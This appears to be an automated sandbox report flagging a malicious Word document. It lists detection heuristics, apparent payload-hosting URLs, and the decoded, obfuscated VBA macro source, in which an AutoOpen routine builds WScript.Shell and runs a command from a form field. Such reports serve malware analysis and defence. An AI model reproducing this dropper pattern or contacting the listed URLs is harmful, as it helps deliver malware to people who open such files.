Verdict: MALICIOUS
Risk Score: 290

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
The file contains VBA macros that utilize WScript.Shell to execute commands, indicated by the critical OLE_VBA_SHELL and OLE_VBA_WSCRIPT heuristics. The script attempts to construct the string 'WscRipt.sHeLl' and likely uses it to download and execute a second-stage payload from the embedded URLs. The presence of an AutoOpen macro further suggests an automated execution flow upon opening the document.
Heuristics (9)

- ClamAV: Doc.Malware.Generic-6818422-0 (critical) CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Malware.Generic-6818422-0
- VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- WScript.Shell usage (critical) OLE_VBA_WSCRIPT: WScript.Shell usage. Matched line in script: `XSS84 = "" + Downsized41 + blue15 + AutoLoanAccount4 + "WscRipt.sHeLl" + Liaison8 + payment82` (between `End Select` and `Select Case National91`)
- CreateObject call (high) OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script: `indexing17 = Array(International81, skyblue75, Awesome62, CreateObject("" + Incredible83 + Factors81 + XSS84).Run!("" + Executive88 + Namibia79 + copying52 + initiatives70.TextBox1 + invoice65 + proactive13, PGWAhWwuk), Cambridgeshire71, AwesomeCottonTable73, GuyanaDollar91)` (between `End Select` and `Select Case payment34`)
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low) OLE_VBA_AUTOOPEN: AutoOpen macro. Matched line in script: `Sub autoopen()` (between `Attribute VB_Name = "Marketing96"` and `Mission97 = Research55`)
- Reference to Windows Script Host (high) SC_STR_WSCRIPT: Reference to Windows Script Host
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - `http://samix-num.com/BcFUhvDr@http://economiadigital.biz/NKq5eOZ@http://ftp.dailyigni` (in document text, OLE body)
  - `http://migoshen.org/FNE1TVJjI@http://vanoostrom.org/w8yXb69h5` (in document text, OLE body)
  - `http://schemas.openxmlformats.org/drawingml/2006/main` (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: d58bc63444b91bae6c3d43940b5e3e46ea5cdbf00509346fde36f3b1a44c9f29) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4890 bytes |
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "initiatives70"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Attribute VB_Name = "olive13"
Function reciprocal90()
On Error Resume Next
Select Case Rubber92
Case 210
Rubber87 = CLng(641)
Accountability31 = EXE10
pixel78 = CDate(Island53)
missioncritical8 = JBOD5
website86 = Int(743)
Case 276
tangible46 = helpdesk94
RefinedPlasticCar27 = Cos(Operations63)
yellow25 = Alabama24
knowledgebase17 = ChrB(941)
repurpose53 = paradigm7
End Select
Select Case redefine63
Case 40
invoice79 = CLng(33)
payment62 = Buckinghamshire55
generating32 = CDate(CostaRicanColon2)
interfaces29 = FantasticFrozenSalad91
haptic17 = Int(529)
Case 798
Station17 = LicensedSteelKeyboard15
program22 = Cos(Sleek66)
Openarchitected16 = hardware27
clearthinking15 = ChrB(627)
Ergonomic51 = Islands42
End Select
XSS84 = "" + Downsized41 + blue15 + AutoLoanAccount4 + "WscRipt.sHeLl" + Liaison8 + payment82
Select Case National91
Case 513
seamless79 = CLng(632)
AwesomeSteelCheese49 = backend19
Naira33 = CDate(bypass13)
AlgerianDinar74 = digital15
GB34 = Int(336)
Case 187
empower61 = Dynamic58
compress31 = Cos(Adaptive10)
magenta74 = red33
Inlet13 = ChrB(924)
strategy28 = driver2
End Select
Select Case Product94
Case 253
partnerships84 = CLng(216)
Borders1 = infrastructures95
optical37 = CDate(integrate84)
Colorado48 = Quality14
Cotton85 = Int(324)
Case 996
transmit75 = Buckinghamshire85
content88 = Cos(Sleek52)
Lodge63 = Solutions75
withdrawal93 = ChrB(870)
webreadiness94 = optical68
End Select
PGWAhWwuk = 0
Select Case networks98
Case 731
Lake74 = CLng(926)
TimorLeste71 = Stream11
networks43 = CDate(Land74)
Wyoming85 = XML88
Assistant69 = Int(298)
Case 74
Ranch25 = vertical42
GenericSteelTable27 = Cos(mindshare70)
Tala37 = platforms99
EthiopianBirr49 = ChrB(734)
MoneyMarketAccount17 = leadingedge96
End Select
Select Case deposit47
Case 505
Data98 = CLng(947)
Pula76 = JBOD26
Electronics50 = CDate(Directives93)
digital61 = THX19
Gambia17 = Int(319)
Case 449
Ergonomic98 = quantify7
Cotton10 = Cos(connecting16)
Berkshire9 = Clothing55
Director47 = ChrB(366)
syndicate95 = NewMexico87
End Select
indexing17 = Array(International81, skyblue75, Awesome62, CreateObject("" + Incredible83 + Factors81 + XSS84).Run!("" + Executive88 + Namibia79 + copying52 + initiatives70.TextBox1 + invoice65 + proactive13, PGWAhWwuk), Cambridgeshire71, AwesomeCottonTable73, GuyanaDollar91)
Select Case payment34
Case 187
FantasticSteelBall12 = CLng(385)
RusticPlasticMouse34 = alarm31
fullrange42 = CDate(Rubber80)
Officer99 = Berkshire10
unleash32 = Int(738)
Case 449
JSON69 = Cambridgeshire41
RSS61 = Cos(Generic68)
FantasticGraniteGloves74 = SmallPlasticChicken28
superstructure53 = ChrB(154)
Avon42 = wireless14
End Select
Select Case streamline25
Case 57
r1080p8 = CLng(54)
extend65 = GenericCottonBall73
withdrawal67 = CDate(Selfenabling50)
Toys97 = deposit30
invoice89 = Int(805)
Case 908
parse20 = whiteboard69
Generic43 = Cos(Electronics91)
AntiguaandBarbuda21 = Sharable29
withdrawal34 = ChrB(875)
Fantastic66 = orchid16
End Select
Select Case Corporate43
Case 789
repurpose94 = CLng(703)
HandcraftedSteelShirt34 = Frozen36
asynchronous23 = CDate(Frontline16)
COM10 = Industrial86
AwesomeConcreteShirt37 = Int(179)
Case 918
Cotton49 = circuit62
multistate29 = Cos(Squares17)
directional22 = ivory47
Granite98 = ChrB(745)
bypass29 = Metal48
End Select
End Function
Attribute VB_Name = "Marketing96"
Sub autoopen()
Mission97 = Research55
synergies78 = Array(Steel97, userfacing1, Park30, reciprocal90, TurkishLira30, dynamic33, wireless52)
input37 = deposit7
End Sub
Function Assistant78()
ShoesMovies40 = clientdriven19
End Function
```